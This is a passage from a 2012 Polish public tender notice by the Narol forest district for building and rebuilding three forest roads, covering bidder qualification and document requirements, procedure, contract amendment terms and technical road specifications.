<ul class="kh_indent_1"><li><p>Warunek wymieniony powyżej Zamawiający uzna za spełniony, jeżeli wykonawca wykaże, że dysponuje co najmniej: jednym kierownikiem budowy posiadającym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej z ograniczeniami, określone przepisami ustawy Prawo budowlane (Dz.U. z 2010 r., Nr 243, poz. 1623 z późn. zm.) lub odpowiadające im uprawnienia budowlane. W przypadku obywateli państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej muszą oni spełniać wymogi określone w art. 12a ustawy Prawo budowlane, z których wynika, że samodzielne funkcje techniczne w budownictwie mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2008 r. Nr 63, poz. 394).
Podstawę do wykonywania samodzielnych funkcji technicznych w budownictwie stanowi wpis, w drodze decyzji, do centralnego rejestru osób posiadających uprawnienia budowlane prowadzonego przez Głównego Inspektora Nadzoru Budowlanego, oraz - zgodnie z ustawą o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz.U. z 2001 r. Nr 5, poz. 42, ze zm.) - wpis na listę członków właściwej izby samorządu zawodowego, potwierdzony zaświadczeniem wydanym przez tę izbę, z określonym w nim terminem ważności.
Ocena spełnienia warunku udziału w postępowaniu, o którym mowa powyżej dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie dokumentów i oświadczeń złożonych wraz z ofertą.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek wymieniony powyżej Zamawiający uzna za spełniony, jeżeli wykonawca wykaże, że:
1) 	posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż:
- dla części I - 500 000.  00 zł. (słownie: pięćset tysięcy złotych),
- dla części II - 400 000. 00 zł (słownie: czterysta tysięcy złotych),
- dla części III - 900 000.  00 zł. (słownie: dziewięćset tysięcy złotych), oraz
2)  jest ubezpieczony od odpowiedzialności cywilnej (OC) w zakresie prowadzonej działalności, związanej z przedmiotem zamówienia - na kwotę co najmniej:
- dla części I - 500 000.  00 zł. (słownie: pięćset tysięcy złotych),
- dla części II - 400 000. 00 zł (słownie: czterysta tysięcy złotych),
- dla części III - 900 000.  00 zł. (słownie: dziewięćset tysięcy złotych),
Ocena spełnienia warunku udziału w postępowaniu, o którym mowa powyżej dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie dokumentów i oświadczeń złożonych wraz z ofertą.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku, gdy Wykonawca dla potwierdzenia spełniania warunków udziału w postępowaniu przedstawi dokumenty zawierające kwoty wyrażone w walutach innych niż złoty polski, Zamawiający przeliczy je na złoty polski. Do przeliczenia zostanie zastosowany wyliczony i ogłoszony przez Narodowy Bank Polski kurs średni waluty na dzień: * wystawienia przez instytucję finansową dokumentu o posiadaniu środków finansowych na rachunku bankowym o zdolności kredytowej, * wystawienia polisy odpowiedzialności cywilnej, * zakończenia realizacji zamówienia potwierdzającego posiadanie stosownego doświadczenia,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Istotne dla stron postanowienia zawiera wzór umowy stanowiący załącznik nr 4 do SIWZ. Zamawiający przewiduje możliwość dokonania następujących zmian istotnych postanowień umowy w stosunku do treści oferty, na podstawie której dokonany zostanie wybór wykonawcy: 1).zmiana ceny oferty na skutek zmiany stawki podatku VAT - w przypadku zmiany dokonanej przez władzę ustawodawczą w trakcie trwania umowy, wynikającej ze zmiany ustaw o podatku od towarów i usług oraz o podatku akcyzowym; 2).zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej takimi samymi uprawnieniami, jakie wymagane były w SIWZ 3).zmiana podwykonawcy, przy pomocy którego Wykonawca realizuje przedmiot umowy na innego legitymującego się takimi samymi kwalifikacjami/doświadczeniem zawodowym po uprzedniej akceptacji Zamawiającego. 4). zmniejszenie zakresu zadań do wykonania - zmniejszenie wynagrodzenia będzie obliczone w oparciu o stawki jednostkowe wymienione w ofercie z uwzględnieniem ilości rzeczywiście wykonanych prac. 2. Umowa zostanie zawarta na podstawie złożonej przez wykonawcę oferty. 3. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy. Każda zmiana i uzupełnienie umowy, będzie wymagać aneksu w formie pisemnej pod rygorem nieważności. Poza innymi przypadkami określonymi w treści umowy, zmiany umowy będą mogły być wprowadzone w związku z zaistnieniem okoliczności, których wystąpienia Zamawiający i wykonawca nie przewidzieli w chwili zawierania umowy. 4. Zamawiający dopuszcza możliwość zmian umowy w następującym zakresie i na określonych poniżej warunkach. Na podstawie art. 144 ust. 1 ustawy PZP dopuszcza się zmianę zawartej umowy pomiędzy wykonawcą a zamawiającym w stosunku do treści oferty z zastosowaniem: - zmiany terminu wykonania prac (termin wykonania prac może ulec zmianie w następujących okolicznościach: - wystąpieniem warunków pogodowych mających wpływ na brak możliwości prowadzenia robót budowlanych, np.: długotrwałe intensywne opady trwające powyżej 7 dni, powódź powodująca konieczność przerwania robót na czas niezbędny na osuszenie zalanego terenu do momentu, w którym możliwa jest kontynuacja lub rozpoczęcie robót, itp.; - okolicznościami, których nie można było przewidzieć w chwili zawarcia Umowy, takich jak: siła wyższa, kolizje transportowe lub komunikacyjne itp. - powodujące zniszczenia lub uszkodzenia wymagające naprawy, a także związane z odkryciem w gruncie przedmiotów niemożliwych wcześniej do zidentyfikowania takich jak: głazy narzutowe, niewybuchy, przedmioty wymagające ochrony Konserwatora Zabytków itp.; - przeszkód wynikających z organów administracyjnych w zakresie nadzoru, oraz warunków wykonywania przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_narol/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Narol, ul. Bohaterów Września 1939 r. Nr 38, 37-610 Narol pokój nr 8 (Sekretariat)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2012 godzina 10:00, miejsce: Nadleśnictwo Narol, ul. Bohaterów Września 1939 r. Nr 38, 37-610 Narol pokój nr 8 (Sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Termin wykonania zamówienia
- termin rozpoczęcia: po podpisaniu umowy,
- termin zakończenia zamówienia: dla Części 1 - I etap do 15.11.2012 r., II etap do 29.06.2013 r. dla Części 2, 3 do 15.11.2012 r..  
Dla Części 1 - Etap I obejmuje poz. Przedmiaru robót - od 1 - 21, 26 - 27; Etap II obejmuje poz. Przedmiaru robót - od 22 - 25, 28 - 29..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa drogi leśnej w Leśnictwie Gorajec w km 0+000-1+547, w km 1+547                   -2+650, nr inw. IN/2011/24..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRAC
1. Charakterystyka techniczna
- kategoria ruchu KR1-2
- droga wewnętrzna administrator Nadleśnictwo Narol
- prędkość projektowa 30km/h
-obciążenie 80KN/oś
- teren równinny
- przekrój poprzeczny szlakowy km 0 + 000 - km 2+650
- szerokość jezdni km 0 + 000 - km 2+650 - 3,50 m
- szerokość pobocza ziemnego str. L i P - 1.50m
- projektowana nawierzchnia drogi tłuczniowa zamknięta powierzchniowym utrwaleniem
-projektowana podbudowa z tłucznia
- projektowane mijanki wg Tabeli mijanek
- projektowane zjazdy wg Tabeli zjazdów
- odwodnienie drogi system rowów otwartych, przepustów oraz spadków podłużnych                           i poprzecznych
- charakter ruchu obsługa Nadleśnictwa Narol
2. Trasa
Zakres budowy drogi przyjęto do projektu wg poniższej lokalizacji:
- PPO km 0 + 000 krawędź drogi leśnej utwardzonej
- KPO km 2+650,
Projektowana budowa drogi leśnej znajduje się w całości w granicach pasa drogowego stanowiącego własność Nadleśnictwa Narol. Szerokość pasa drogowego 10m - 12m.
3. Przekrój podłużny
Na całym odcinku niweletę projektowanej drogi leśnej dostosowano do istniejącego terenu
uwzględniając roboty ziemne i spadki podłużne drogi. Spadki podłużne i poprzeczne niwelety uwarunkowano przebiegiem istniejącej drogi.
4. Przekrój normalny
Spadek poprzeczny poboczy ziemnych 6% w kierunku rowu. Spadek jezdni daszkowy na prostej 2%.
Na łukach jednostronny (spadki na łukach poziomych przyjąć wg projektu technicznego), rowy trapezowe, szerokość dna rowu 0.40m, pochylenie skarp do 1.5. Spadki poprzeczne na mijankach i 1%.
5. Konstrukcja nawierzchni obliczona na podstawie badań geologicznych
Projektowana nawierzchnia km 0 + 000 - km 0+600, 1+200-2+300
- dwukrotne powierzchniowe utrwalenie emulsją i grysem
- 15cm górna warstwa nawierzchni z tłucznia 20/63 z zaklinowaniem
- 20cm dolna warstwa podbudowy z tłucznia 63/80
- 15cm warstwa odsączająca z piasku
Projektowana nawierzchnia km 0+600-1+200
- dwukrotne powierzchniowe utrwalenie emulsją i grysem
- 10cm górna warstwa nawierzchni z tłucznia 20/63 z zaklinowaniem
- 20cm dolna warstwa podbudowy z tłucznia 63/80
- 15 cm stabilizacja gruntu cementem o Rm= 2.5 MPa
- 15cm warstwa odsączająca z piasku
Projektowana nawierzchnia 2+300-2+650
- dwukrotne powierzchniowe utrwalenie emulsją i grysem
- 10cm górna warstwa nawierzchni z tłucznia 20/63 z zaklinowaniem
- 15cm dolna warstwa podbudowy z tłucznia 63/80
- 15 cm stabilizacja gruntu cementem o Rm= 2.5 MPa
- 30cm warstwa odsączająca z piasku
Projektowana nawierzchnia mijanek
- dwukrotne powierzchniowe utrwalenie emulsją i grysem
- 15cm górna warstwa nawierzchni z tłucznia 20/63 z zaklinowaniem
- 20cm dolna warstwa podbudowy z tłucznia 63/80
- 15cm warstwa odsączająca z piasku
Nawierzchnia zjazdów
- dwukrotne powierzchniowe utrwalenie emulsją i grysem
- 15cm górna warstwa nawierzchni z tłucznia 20/63 z zaklinowaniem
- 20cm dolna warstwa podbudowy z tłucznia 63/80
- 15cm warstwa odsączająca z piasku
6. Rowy
W celu poprawy spływu wód opadowych z przyległego terenu projektuje się następujące roboty:
- wykonanie rowów km 0 + 000 - km 2+650str. L i P, projektuje się rowy trapezowe szerokość dna rowu 0.40m, pochylenie skarp od do 1 : 1.5, 
- w celu likwidacji załamań trasy i uzyskania pasa drogowego 10m - 12m projektuje się wykonanie karczowania krzaków i pni drzew.
Woda z rowów zostanie odprowadzona w teren lub do istniejącego cieku wodnych.
7. Zjazdy
Na projektowanym odcinku znajdują się zjazdy do lasu. Lokalizacja i szczegółowe zakresy robót przedstawiono w Tabeli zjazdów. Na w/w zjazdy roboty będą polegać na budowie części przelotowych i nawierzchni zjazdów. Projektuje się ułożenie części przelotowej zjazdu z rur fi 60 PECOR OPTIMA SN6 dwuściennych karbowanych o sztywności obwodowej 6kPa z PEHD lub równoważnych. Na zjazdach projektuje się wykonanie murków czołowych str. L i P.
8. Pobocza
Projektuje się utwardzenie poboczy wysiewką kamienną grubości 12cm i szer. 0.50m
9. Odwodnienie
W celu poprawy odwodnienia projektuje się wykonanie przepustów: wg tabeli przepustów.
Projektuje się ułożenie części przelotowej z rur PECOR OPTIMA SN8 dwuściennych karbowanych o sztywności obwodowej 8kPa z PEHD lub równoważnych oraz murki czołowe.
10. Oznakowanie pionowe
W celu zapewnienia bezpieczeństwa ruch projektuje się ustawienie słupków i tablic znaku.
km 0 + 050 str. L znak A - 7, słupek stalowy
km 0 + 050 str.P znak B-33, słupek stalowy
Miejsce realizacji: odcinek drogi położony jest na terenie województwa podkarpackiego, powiatu lubaczowskiego, gminy Cieszanów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przebudowa drogi leśnej Leśnictwo Płazów w km 0+000 - 2+015, nr inw. IN/2012/27..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRAC

1. Charakterystyka techniczna
- kategoria ruchu KR1-2
- droga wewnętrzna administrator Nadleśnictwo Narol
- prędkość projektowa 30km/h
- teren równinny
-obciążenie 80 KN/oś
- przekrój poprzeczny szlakowy km 0 + 000 - km 2+015
- szerokość pobocza ziemnego str. L i P do 1.50m
- projektowana nawierzchnia tłuczniowa
- projektowane mijanki wg Tabeli mijanek, szer. 2,5m dł. (40+25)/2x2,5m + skosy wjazdowe               i zjazdowe
- odwodnienie drogi system rowów otwartych, przepustów oraz spadków podłużnych                             i poprzecznych
- charakter ruchu obsługa Nadleśnictwa Narol
2. Trasa
Zakres przebudowy drogi przyjęto do projektu wg poniższej lokalizacji:
- PPO km 0+000 granica drogi leśnej asfaltowej
- KPO km 2+015krawędź skrzyżowania dróg leśnych
Projektowana przebudowa drogi leśnej znajduje się w całości w granicach pasa drogowego
stanowiącego własność Nadleśnictwa Narol. Szerokość pasa drogowego 11m - 12m.
3. Przekrój podłużny
Na całym odcinku niweletę projektowanej drogi leśnej dostosowano do istniejącego terenu
uwzględniając roboty ziemne i spadki podłużne drogi. Spadki podłużne i poprzeczne niwelety uwarunkowano
przebiegiem istniejącej drogi .
4. Przekrój normalny
Spadek poprzeczny poboczy ziemnych 6% w kierunku rowu. Spadek jezdni daszkowy na prostej 2%.
Na łukach jednostronny (spadki na łukach poziomych przyjąć wg Projektu technicznego), rowy trapezowe, szerokość dna rowu 0.40m, pochylenie skarp od 1:1 do 1.5. Spadki poprzeczne na mijankach 2%.
Projektowana nawierzchnia km 0 + 000 - km 1+100, km
- 15 cm warstwa odsączająca z piasku o parametrach G1
-20 cm dolna warstwa podbudowy z tłucznia
-15 cm górna warstwa z tłucznia z zaklinowaniem
Projektowana nawierzchnia km 1+100, km km 2 +015
- 15 cm warstwa odsączająca o parametrach G1
- stabilizacja gruntu cementem 15 cm
-20 cm dolna warstwa podbudowy z tłucznia
-10 cm górna warstwa z tłucznia z zaklinowaniem
Projektowana nawierzchnia mijanek
- 15 cm warstwa odsączająca o parametrach G1
-20 cm dolna warstwa podbudowy z tłucznia
-15 cm górna warstwa z tłucznia z zaklinowaniem
Nawierzchnia zjazdów
15 cm warstwa odsączająca o parametrach G1
-20 cm dolna warstwa podbudowy z tłucznia
-15 cm górna warstwa z tłucznia z zaklinowaniem
5. Rowy
W celu poprawy spływu wód opadowych z przyległego terenu projektuje się następujące roboty:
- wykonanie rowów km 0 + 000 - km 3+190str. L i P, projektuje się rowy trapezowe szerokość dna rowu 0.40m, pochylenie skarp od do 1 : 1.5, 
- w celu likwidacji załamań trasy i uzyskania pasa drogowego 11m - 12m projektuje się wykonanie karczowania krzaków i pni drzew.
Woda z rowów zostanie odprowadzona w teren
6. Zjazdy
Na projektowanym odcinku znajdują się zjazdy do lasu. Lokalizacja i szczegółowe zakresy robót przedstawiono w Tabeli zjazdów. Na w/w zjazdy , roboty będą polegać na budowie części przelotowych i nawierzchni zjazdów. Projektuje się ułożenie części przelotowej zjazdu z rur fi 60 PECOR OPTIMA SN6 dwuściennych karbowanych o sztywności obwodowej 6kPa z PEHD lub równoważnych. Na zjazdach projektuje się wykonanie murków czołowych str. L i P.
7. Pobocza
Projektuje się utwardzenie poboczy wysiewką kamienną grubości 12 cm i szer. 0.50m
8. Odwodnienie
W celu poprawy odwodnienia projektuje się wykonanie przepustów: wg tabeli przepustów
Projektuje się ułożenie części przelotowej z rur PECOR OPTIMA SN8 dwuściennych karbowanych o sztywności obwodowej 8kPa z PEHD lub równoważnych oraz murki czołowe.
9. Oznakowanie pionowe
W celu zapewnienia bezpieczeństwa ruch projektuje się ustawienie słupków i tablic znaku.
km 0 + 050 str. L znak A - 7, słupek stalowy
km 1+965 str. P znak A - 7, słupek stalowy
km 0 + 050 str. P znak B-33, słupek stalowy
km 1+945 str. P znak B-33, słupek stalowy


Miejsce realizacji: odcinek drogi położony jest na terenie województwa podkarpackiego, powiatu lubaczowskiego, gminy Narol..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przebudowa drogi leśnej Leśnictwo Wola Wielka w km 0+000 - 5+040.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis prac
1. Charakterystyka techniczna
- droga wewnętrzna administrator Nadleśnictwo Narol
- prędkość projektowa 30km/h
- teren równinny
-obciążenie 80 KN/oś
- przekrój poprzeczny szlakowy km 0 + 000 - km 5+040
- szerokość pobocza ziemnego str. L i P do 1.0m
- projektowana nawierzchnia tłuczniowa
- projektowane mijanki wg Tabeli mijanek szer. 2,5m dł. (40+25)/2x2,5m + skosy wjazdowe i zjazdowe
- odwodnienie drogi system rowów otwartych, przepustów oraz spadków podłużnych i poprzecznych
- charakter ruchu obsługa Nadleśnictwa Narol
2. Trasa
Zakres przebudowy drogi przyjęto do projektu wg poniższej lokalizacji:
- PPO km 0+000 granica drogi powiatowej
- KPO km 5+040, krawędź skrzyżowania droga gminna
Projektowana przebudowa drogi leśnej znajduje się w całości w granicach pasa drogowego
stanowiącego własność Nadleśnictwa Narol. Szerokość pasa drogowego 10-11m.
3. Przekrój podłużny
Na całym odcinku niweletę projektowanej drogi leśnej dostosowano do istniejącego terenu
uwzględniając roboty ziemne i spadki podłużne drogi. Spadki podłużne i poprzeczne niwelety uwarunkowano  przebiegiem istniejącej drogi .
4. Przekrój normalny
Spadek poprzeczny poboczy ziemnych 6% w kierunku rowu. Spadek jezdni daszkowy na prostej 2%.
Na łukach jednostronny (spadki na łukach poziomych przyjąć wg Projektu technicznego), rowy trapezowe, szerokość dna rowu 0.40m, pochylenie skarp od 1:1 do 1.5. Spadki poprzeczne na mijankach i na składach drzewa 1%.
Projektowana nawierzchnia km 0 + 000 - km 0+300, i w km 0+900-1+300
- 15 cm warstwa odsączająca
- geowłóknina
- 20 cm dolna warstwa podbudowy z tłucznia
- 15 cm górna warstwa z tłucznia z zaklinowaniem
Projektowana nawierzchnia km 0 + 300 -0+900 i w km 1+300-5+040
- 15 cm warstwa odsączająca
-20 cm dolna warstwa podbudowy z tłucznia
-15 cm górna warstwa z tłucznia z zaklinowaniem
Projektowana nawierzchnia mijanek i składów drzewa
- 15 cm warstwa odsączająca
-20 cm dolna warstwa podbudowy z tłucznia
-15 cm górna warstwa z tłucznia z zaklinowaniem
Nawierzchnia zjazdów
15 cm warstwa odsączająca
-20 cm dolna warstwa podbudowy z tłucznia
-15 cm górna warstwa z tłucznia z zaklinowaniem
5. Rowy
W celu poprawy spływu wód opadowych z przyległego terenu projektuje się następujące roboty:
- wykonanie rowów km 0 + 000 - km 5+040 str. L i P, projektuje się rowy trapezowe szerokość dna rowu 0.40m, pochylenie skarp od do 1 : 1.5, 
- w celu likwidacji załamań trasy i uzyskania pasa drogowego 10m - 11m projektuje się wykonanie karczowania krzaków i pni drzew.
Woda z rowów zostanie odprowadzona w teren lub do istniejącego cieku wodnych.
6. Zjazdy
